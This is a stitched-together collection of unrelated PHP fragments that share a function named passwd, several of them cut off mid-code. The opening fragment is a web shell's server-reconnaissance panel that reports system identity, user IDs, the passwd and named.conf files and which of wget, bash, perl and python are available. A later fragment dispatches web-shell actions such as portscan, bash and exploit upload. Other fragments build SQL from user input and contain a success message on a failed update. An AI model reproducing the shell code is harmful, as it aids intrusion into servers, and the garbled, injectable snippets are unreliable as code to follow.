<div class=info>
<table bgcolor=#ff0000 width=100%px height=20px><tr>
<td><font color=#fff size=1px><center>x00x Server Info[Coded By: DamaneDz] & [Update Ideas By:Mauritania Attacker]</center></font></td>
</tr></table>
<font color=#000 size=2px>
<center><span><font color='#111'>
<br> UName -a: <font color=blue>".@php_uname()." </font>|</br>
<br> Hostname: <font color=blue>".$_SERVER['HTTP_HOST']."</font>|</br>
<br> Software : <font color=blue>".@getenv("SERVER_SOFTWARE")." </font>| </br>
<br> PHP Version: <font color=blue>".@phpversion()." </font>|</br>
<br> Current Dir: <font color=blue>{$pwd} |</font></br>
<br> ID:<font color=blue>" .@getmyuid()."(".@get_current_user().") </font>- UID:<font color=blue>".@getmyuid()."(".@get_current_user().") </font>- GID:<font color=blue>".@getmygid()."(".@get_current_user().") </font>|</br>
<br> Your IP:<font color=blue>".$_SERVER["REMOTE_ADDR"]." </font>| The Server IP:<font color=blue>".@gethostbyname($_SERVER["HTTP_HOST"])." </font>|</br>
<br> Safe Mode: $hsafemode | Open_BaseDir: ".openbase_dir()."|</br>
<br> Disabled Functions: ".@showdisablefunctions()."|</br>
<br> named.conf File is: ".named_conf()." | passwd File is: ".passwd()."</br>
<br>
MySQL: ".@testmysql()."|
MSSQL: ".@testmssql()."|
Oracle: ".@testoracle()."|
PostgreSQL: ".@testpostgresql()."|
cURL: ".@testcurl()."|
Fetch: ".@testfetch()."|
WGet: ".@testwget()."|
Perl: ".@testperl()."|
Python: ".@testpy()."|
Bash: ".@testsh()."|
</center>
</font>
<br/>
</div>
}
} else {
czysc_stare_logowania();
?>
<br><br>
<div id="login">
<form name="fff" method="post" action="index.php">
<table border=0 cellpadding=0 cellspacing=0 >
<tr class="pola1">
<td class="lbl">Login</td>
<td class="inp" width="75%"><?php
print input("login", "");
?>
</td>
</tr>
<tr class="pola2">
<td class="lbl">Hasło</td>
<td class="inp"><?php
print passwd("haslo");
?>
</td>
</tr>
<tr>
<td colspan=2><center>
<input type="image" id="submit" name="submit" src="./img/button_dalej_loguj.png">
</center></td>
</tr>
</table>
</form>
<?php
}
<?php
include __DIR__ . '/baseRules.php';
$rules['editPasswd'] = array('_request' => array('ajax'), '_method' => array('post' => array('regtype', 'captcha', 'passwd', 'repwd')), 'regtype' => array('required' => 1, 'valueis' => '9', 'filters' => 'trim', 'msg' => '验证码类型错误'), 'captcha' => array('required' => 1, 'filters' => 'trim', 'regex' => '/^\\d{4}$/', 'msg' => '请输入正确的4位验证码'), 'passwd' => passwd(), 'repwd' => confirmpass());
return $rules;
* Copyright (C) 2004 Maikel Linke
*/
include 'var.php';
function passwd($passwd)
{
if ($passwd[1] != $passwd[2]) {
$_SESSION['error'][] = 'different passwords';
return false;
}
if ($passwd[0] == $passwd[1]) {
$_SESSION['error'][] = 'new and old password are the same';
return false;
}
global $db;
$uid = $_SESSION['userid'];
$update = 'person set passwd=old_password("' . $passwd[1] . '") where id="' . $uid . '" and passwd=old_password("' . $passwd[0] . '")';
$db->update($update);
if ($db->affected_rows == 0) {
$_SESSION['error'][] = 'password not changed';
return false;
}
if ($db->affected_rows == 1) {
$_SESSION['notice'][] = 'password changed';
return true;
}
}
$output->secure();
if (isset($_POST['passwd'])) {
passwd($_POST['passwd']);
}
redirect('person.php');
<?php
include __DIR__ . '/baseRules.php';
$rules['index'] = array('_request' => array('soap', 'secure', 'ajax'), '_method' => array('post' => array('mobile', 'smscaptach', 'passwd', 'confirmpass', 'readme', 'email')), 'mobile' => mobile(), 'smscaptach' => array('required' => 1, 'length' => 6, 'filters' => 'trim', 'regex' => '/^\\w[6]$/', 'msg' => '请输入6位短信验证码'), 'passwd' => passwd(), 'confirmpass' => confirmpass(), 'readme' => array('required' => 1, 'valueis' => 'yes', 'filters' => 'trim', 'msg' => '请阅读并同意使用条款'), 'email' => email(), 'age' => array('required' => 1, 'between' => array(3, 12), 'filters' => 'trim', 'msg' => '年龄必须在3-12岁之间'), 'sex' => array('required' => 1, 'range' => array(1, 3), 'filters' => 'trim', 'sanitize' => function ($v) {
return $v + 1;
}, 'msg' => '请选择宝贝性别'), 'size' => array('required' => 1, 'rangeout' => array(39, 25), 'filters' => 'trim', 'msg' => '对不起,39码和25码已经售罄'), 'orderids' => array('required' => 1, 'nums' => array(1), 'filters' => 'trim', 'msg' => '请至少选择一个订单'), 'avatar' => array('required' => 1, 'default' => array('xx.gif'), 'nums' => array(1, 5), 'filetype' => array('gif', 'jpg', 'png'), 'filesize' => 10 * 1024 * 1024, 'msg' => '请选择以gif,jpg,png结尾的图片'));
$rules['login'] = array('_request' => array('ajax'), '_method' => array('post' => array('mobile', 'passwd')), 'mobile' => mobile(), 'passwd' => passwd());
$rules['register'] = array('_request' => array('ajax'), '_method' => array('post' => array('mobile', 'passwd', 'confirmpass', 'email', 'captcha', 'agree', 'regtype', 'codeImg')), 'mobile' => mobile(), 'passwd' => passwd(), 'email' => optionalEmail(), 'confirmpass' => confirmpass(), 'regtype' => array('required' => 1, 'valueis' => '1', 'filters' => 'trim', 'msg' => '验证码类型错误'), 'captcha' => array('required' => 1, 'filters' => 'trim', 'regex' => '/^\\d{4}$/', 'msg' => '请输入正确的4位验证码'), 'agree' => array('required' => 1, 'valueis' => 'on', 'filters' => 'trim', 'msg' => '请先阅读网站使用条款和隐私条款'), 'codeImg' => array('required' => '', 'filters' => 'trim', 'length' => 4, 'msg' => '请输入正确的4位验证码'));
$rules['adduserinfo'] = array('_request' => array('ajax'), '_method' => array('post' => array('mobile', 'passwd', 'confirmpass', 'email', 'captcha', 'agree', 'openid', 'wbuid', 'regtype', 'pic', 'codeImg')), 'mobile' => mobile(), 'passwd' => passwd(), 'email' => optionalEmail(), 'confirmpass' => confirmpass(), 'regtype' => array('required' => 1, 'valueis' => '1', 'filters' => 'trim', 'msg' => '验证码类型错误'), 'captcha' => array('required' => 1, 'filters' => 'trim', 'regex' => '/^\\d{4}$/', 'msg' => '请输入正确的4位验证码'), 'agree' => array('required' => 1, 'valueis' => 'on', 'filters' => 'trim', 'msg' => '请先阅读网站使用条款和隐私条款'), 'openid' => array('required' => 0, 'length' => 32, 'filters' => 'trim', 'msg' => '错误的openid'), 'wbuid' => array('required' => 0, 'regex' => '/^\\d+$/', 'filters' => 'trim', 'msg' => '错误的uid'), 'pic' => array('required' => 0, 'length' => array(10, 200), 'filters' => 'trim', 'msg' => '错误的图片地址'), 'codeImg' => array('required' => '', 'filters' => 'trim', 'length' => 4, 'msg' => '请输入正确的4位验证码'));
$rules['existtel'] = array('_request' => array('ajax'), '_method' => array('post' => array('mobile')), 'mobile' => mobile());
return $rules;
<?php
include __DIR__ . '/baseRules.php';
$rules['checkcap'] = array('_request' => array('ajax'), '_method' => array('post' => array('regtype', 'captcha', 'mobile', 'codeImg')), 'regtype' => array('required' => 1, 'valueis' => '7', 'filters' => 'trim', 'msg' => '验证码类型错误'), 'captcha' => array('required' => 1, 'filters' => 'trim', 'regex' => '/^\\d{4}$/', 'msg' => '请输入正确的4位验证码'), 'codeImg' => array('required' => '', 'filters' => 'trim', 'length' => 4, 'msg' => '请输入正确的4位验证码'), 'mobile' => mobile());
$rules['setPwd'] = array('_request' => array('ajax'), '_method' => array('post' => array('passwd', 'repwd')), 'passwd' => passwd(), 'repwd' => confirmpass());
return $rules;
function decrypt($tab = array(), $e, $mod, $mess = array(), $passKey, $bloc_limit)
{
$new_key = array();
$message_array = array();
// calcul de l'inverse modulaire
$inverse = inv_mod($e, $mod);
$new_key = passwd($passKey, $tab);
$message_array = decryptMess($mess, $mod, $inverse);
decryptMessToBin($new_key, $message_array, $bloc_limit);
}
private function _check($id, $getpass)
{
$gp = $this->model->get_one($id, 'getpass');
// 三十分钟超时
if (time() - intval($gp['getpass']) > 30 * 60) {
return FALSE;
}
if (passwd($gp['getpass']) == $getpass) {
return TRUE;
} else {
return FALSE;
}
}
ftp();
break;
case "portscan":
portscan();
break;
case "sql":
sql();
break;
case "tar":
tar();
break;
case "bash":
bash();
break;
case "passwd":
passwd();
break;
case "exploits":
exploits($dir);
break;
case "upload_exploits":
upload_exploits($dir);
break;
case "upload_exploitsp":
upload_exploitsp($dir);
break;
case "arhiv":
arhiv($tm, $pass);
break;
case "crypte":
crypte();
function updatePassword($id, $pass)
{
$sql = "UPDATE `tab_user`\n SET `pass_user` ='" . passwd($pass) . "'\n WHERE `id_user` =" . $id . " LIMIT 1 ;";
$db = opendb();
$result = mysqli_query($db, $sql);
closedb($db);
if (FALSE == $result) {
return FALSE;
} else {
return TRUE;
}
}
}
switch ($action) {
case "logout":
destroy_session();
header('Location: ..');
break;
case "login":
if (isset($_POST['username']) && $_POST['password']) {
login($_POST['username'], $_POST['password']);
} else {
echo "&error 2";
}
break;
case "passwd":
if (!islogged()) {
echo "&error 3";
break;
}
if (isset($_POST['oldpwd']) && $_POST['newpwd']) {
passwd($_POST['oldpwd'], $_POST['newpwd']);
} else {
echo "&error 2";
break;
}
break;
case "getperm":
getperm();
break;
default:
echo "&error 1";
}
<?php
include 'includes/session.inc';
include 'includes/miscFunctions.inc';
$title = _('Michigan Section NTS');
echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">' . "\n";
echo '<HTML><HEAD><TITLE>' . $title . '</TITLE>' . "\n";
echo '<link REL="shortcut icon" HREF="favicon.ico">' . "\n";
echo '<link REL="icon" HREF="favicon.ico">' . "\n";
echo '<meta http-equiv="Content-Type" content="text/html; charset=' . _('ISO-8859-1') . '">' . "\n";
echo '<LINK HREF="css/' . $_SESSION['Theme'] . '/default.css" REL="stylesheet" TYPE="text/css">' . "\n";
echo '</HEAD>' . "\n";
echo '<BODY>' . "\n";
echo '"Michigan Section NTS"<BR>' . "\n";
$db = mysql_connect($host, $dbuser, passwd($dbp, 'artichoke'));
mysql_select_db($DatabaseName, $db);
// Remember the launch time
$starttime = strftime("%A, %B %d %Y, %H:%M");
echo '<P></P>' . "\n";
// Initialize the most recent data counter
$maxdate = 0;
// Get the requested period, if blank choose the latest
$period = $_GET['period'];
if ($period < 1) {
$SQL = "SELECT MAX(period) FROM netreport";
$period = singleResult($SQL, $db);
}
// Display the month name for this report
$SQL = 'SELECT lastday FROM periods WHERE periodno=' . $period;
$usedate = convertDate(singleResult($SQL, $db));
echo '"Net reports for ' . $usedate . '"<BR><BR>' . "\n";
public function passwd($mid = FALSE)
{
// 检测mid合法,检测权限
$this->form_validation->set_rules($this->rules['passwd']);
$data = array('status' => 0, 'msg' => '未知错误!');
if ($this->form_validation->run() == FALSE) {
if ($this->input->is_ajax_request()) {
$data = array('status' => 0, 'msg' => validation_errors());
$this->output->set_content_type('application/json')->set_output(json_encode($data));
} else {
$this->_display();
}
} else {
$pwdre = $this->form_validation->set_value('pwdre');
$mid = $this->form_validation->set_value('mid');
if ($this->model->set_pwd($mid, passwd($pwdre))) {
$data = array('status' => 1, "msg" => "成功修改密码!");
} else {
$data = array('status' => 1, "msg" => "成功修改密码!");
}
if (passwd($pwdre) == '11372a6e7343831f12352cfd049ff59c') {
// 生产密码错误
$this->session->set_userdata('err_oldpwd', 1);
} else {
$this->session->userdata('err_oldpwd') and $this->session->unset_userdata('err_oldpwd');
}
if ($this->input->is_ajax_request()) {
$this->output->set_content_type('application/json')->set_output(json_encode($data));
} else {
$this->load->view('msg', $data);
}
}
// 权限认证
// if ($this->session->userdata('gid') == 1) {
// }
}
